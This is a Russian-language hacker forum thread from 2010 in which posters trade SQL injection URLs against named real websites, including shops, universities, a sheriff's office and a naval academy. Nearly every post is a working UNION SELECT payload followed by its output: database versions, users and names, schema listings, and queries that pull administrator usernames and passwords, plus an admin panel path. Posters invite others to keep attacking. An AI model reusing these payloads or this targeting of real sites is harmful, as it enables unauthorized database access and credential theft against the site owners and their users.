http://buhservis-plus.ru/news-all.php?nid=-1+and+1=2+union+all+select+1,aes_decrypt(aes_encry pt(concat_ws(0x3a,@@version,user(),database(),@@ve rsion_compile_os),0x71),0x71),3,4,5,6--
version : 5.1.41-log
user : m35455@fhe2.hoster.ru
database : db35455m
os : portbld-freebsd8.0
http://www.crocs.web.id/footwear_detail.php?mainID=-12+union+select+1,2,3,4,concat(username,char(58),p assword),6,7,8,9,10,11+from+admin+limit+0,1--
aka_zver
28.04.2010, 17:24
Сайт: http://www.flo-cert.net
ТИЦ: 10
PR: 6
Пример запроса: http://www.flo-cert.net/flo-cert/main.php?id=-8+union+select+1,concat_ws(0x0b,database(),user(), version(),@@version_compile_os),3,now(),5,6,7,8,9
database - flocert_web2
user - fcw2db@localhost
version - 5.0.32-Debian_7etch10
os - pc-linux-gnu
tables:
CHARACTER_SETS,
COLLATIONS,
COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,
COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,
ROUTINES,
SCHEMATA,
SCHEMA_PRIVILEGES,
STATISTICS,
TABLES,
TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,
TRIGGERS,
USER_PRIVILEGES,
VIEWS,
flocert_content,
flocert_glossary,
flocert_menus,
flocert_news,
flocert_newsletter,
flocert_topmenu,
flocert_users
columns:
CHARACTER_SET_NAME,
DEFAULT_COLLATE_NAME,
DESCRIPTION,
MAXLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
ID,
IS_DEFAULT,
IS_COMPILED,
SORTLEN,
COLLATION_NAME,
CHARACTER_SET_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
COLUMN_DEFAULT,
IS_NULLABLE,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
CHARACTER_OCTET_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE,
CHARACTER_SET_NAME,
COLLATION_NAME,
COLUMN_TYPE,
COLUMN_KEY,
EXTRA,
PRIVILEGES,
COLUMN_COMMENT,
GRANTEE,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
PRIVILEGE_TYPE,
IS_GRANTABLE,
CONSTRAINT_CATALOG,
CONSTRAINT_SCHEMA,
CONSTRAINT_NAME,
TABLE_CATALOG,
TABLE_SCHEMA,
TABLE_NAME,
COLUMN_NAME,
ORDINAL_POSITION,
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,
REFERENCED_TABLE_NAME,
REFERENCED_COLUMN_NAME,
SPECIFIC_NAME,
ROUTINE_CATALOG,
ROUTINE_SCHEMA,
ROUTINE_NAME,
ROUTINE_TYPE,
DTD_IDENTIFIER,
ROUTINE_BODY,
ROUTINE_DEFINITION,
EXTERNAL_NAME,
EXTERNAL_LANGUAGE,
PARAMETER_STYLE,
IS_DETERMINISTIC,
SQL_DATA_ACCESS,
SQL_PATH,
SECURITY_TYP
http://www.fa-kit.ru/users.php?id=-1+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,id,name,pa ss,role),7,8,9,10,11,12,13+from+USERS+LIMIT+0,1--+
role=7 - админы
http://www.vashilinzy.ru/shop/ALL_.html?v[10]=-31+union+select+1,aes_decrypt(aes_encrypt(concat_w s(0x3a,@@version,user(),database(),@@version_compi le_os),0x71),0x71),3,4--
version : 4.1.25-log
user : vashili3_root@localhost
database : vashili3_cms
os : portbld-freebsd6.3
KENT1994
28.04.2010, 21:07
http://www.rpguides.de/dnd/game.php?id=-67UNION ALL SELECT %String_Col%,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
Host IP: 62.75.178.13
Web Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2 PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Powered-by: PHP/5.2.4-2ubuntu5.10
DB Server: MySQL unknown ver
Current DB: RPGuides
переходим на немецкие сайты? :) ;)
http://www.jempartners.ch/ita/news.php?id=1191UNION ALL SELECT 1,2,3,4,5,6,7,%String_Col%,9,10,11,12,13,14,15,16, 17,18,19,20,21--
Host IP: 212.90.211.186
Web Server: Apache
Powered-by: PHP/5.2.0-8+etch7
DB Server: MySQL >=5
Current DB: jempartners_ch
http://www.kidneytimes.net/article.php?id=-20100301172740+union+select+1,2,version(),4,5,6,7, 8,9,10,11--+
версия - 4
-----
http://dddb.net/php/latestnews_Linked.php?id=-2702+union+select+version(),2,3,4
версия - 5
http://brooklynradio.net/show.php?id=-22+union/**/select+1,2,3,4,5,6,user(),8--+
user:soulstat_soulsta@localhost
version:5.1.30
шеленг не прошел =(
едушка
http://www.southeastern.edu.gr/article.php?NewsID=-37+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7,8,9+from+administrator
KENT1994
29.04.2010, 00:01
http://www.gemeindefreiheit.de/de/aktuelles/news.php?id=-20UNION ALL SELECT 1,2,3,4,5,%String_Col%,7,8--
Host IP: 213.198.64.111
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7m mod_apreq2-20051231/2.6.0 mod_perl/2.0.3 Perl/v5.8.7
DB Server: MySQL unknown ver
http://www.iutoic-dhaka.edu/dnotice.php?nid=999999%27+and+0+union+select+1,2,c oncat_ws(0x3a%20,user(),database(),version()),4/*
User: mainsite@localhost
Version: 4.1.7
Database: mainsite
Google PR: 6
http://www.papiorec.org/index.php?url=-8+union+select+unhex%28hex%28version%28%29%29%29--
http://www.imagine-parfum.ru/show_brand_info.php?id=-4+union+all+select+aes_decrypt(aes_encrypt(concat_ ws(0x3a,version(),user(),database(),@@version_comp ile_os),0x71),0x71)--&select=brand
version : 5.0.51a-15-log
user : u9667@be2
database : u9667_imagine
os : debian-linux-gnu
http://server3.nmdesigns.com/stpgov/www/cal-view.php?ID=-4495+union+select+1,concat_ws(0x3a,version(),datab ase(),user(),@@version_compile_os),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37--+&event_date=2010-01-12
user:stpgovread@localhost
version:4.1.20
database:STPGOV
http://www.stpso.com/mostwanted.php?id=-48+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--+
version:4.1.20
user:stpso@localhost
database:stpso
С детства не люблю полицменов=)
http://www.louisianapropane.com/events.php?action=submit&id=-10+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user(),@@version_compile_os),6,7--+
version:5.0.90-log
user:louisianap472411@209.235.136.113
database:fuel_louisianapropane_com
pr:4
_________________________________________
http://www.mseuf.edu.ph/index2.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2+union+select+1,2,3,concat_ws%280x3a,username ,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19+from+jos_users+where+gid=25--
http://www.escuelanaval.edu.co/index2.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2+union+select+1,2,3,concat_ws%280x3a,username ,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19+from+jos_users+where+gid=25--
http://www.stevegoldada.com/stevegoldada/archive.php?mode=P&id=-285+union+select+1,version(),3,4,5,6,7--+
version:4.0.12-max
user:www@localhost
http://amperia.profoffice.ru/index.php?page=3&id=-39+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database(),@@version_compile_os),8,9+--
version : 5.0.67-Max
user : profoffice@localhost
database : :profoffice_ru_3
os : suse-linux-gnu
http://amperia.profoffice.ru/admin.php
http://www.infoholix.net/category.php?mId=-105+union+select+1,concat_ws(0x3a%20,user(),databa se(),version()),3,4,5,6,7,8,9,10+from+users+limit+ 0,1/*
User: infomax1_wiha@localhost
Version: 4.1.22-standard
Database: infomax1_infoholix2
[Feldmarschall]
29.04.2010, 22:55
http://www.findjewellery.co.uk/all/material-gold/f/?price_from=20&price_to=50+or%281,1%29=%28select+count%28*%29,con cat%28%28select+concat%28version%28%29,database%28 %29,user%28%29%29+from+information_schema.tables+l imit+0,1%29,0x3a,floor%28rand%28%29*2%29%29+from+i nformation_schema.tables+group+by+2+limit+1,1%29--
Version: 5.0.67-community
Database: findjewe_jewellerysite
User: findjewe_jewelle@localhost'
http://www.jewellerylove.co.uk/modules/shop/view.asp?Prodcode=HA5145%27+or+1=0
MSAccess
http://www.txunitedmga.com/news_article.php?id=-182+union+select+concat_ws(0x3a,username,password) ,2,3,4+from+users+limit+0,1--+
user:R687_txumga@f2.5.1343.static.theplanet.com
version:5.0.22-community-nt:r687_txumga
Я обломился, может кому повезет? Дерзаем товарищи!
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot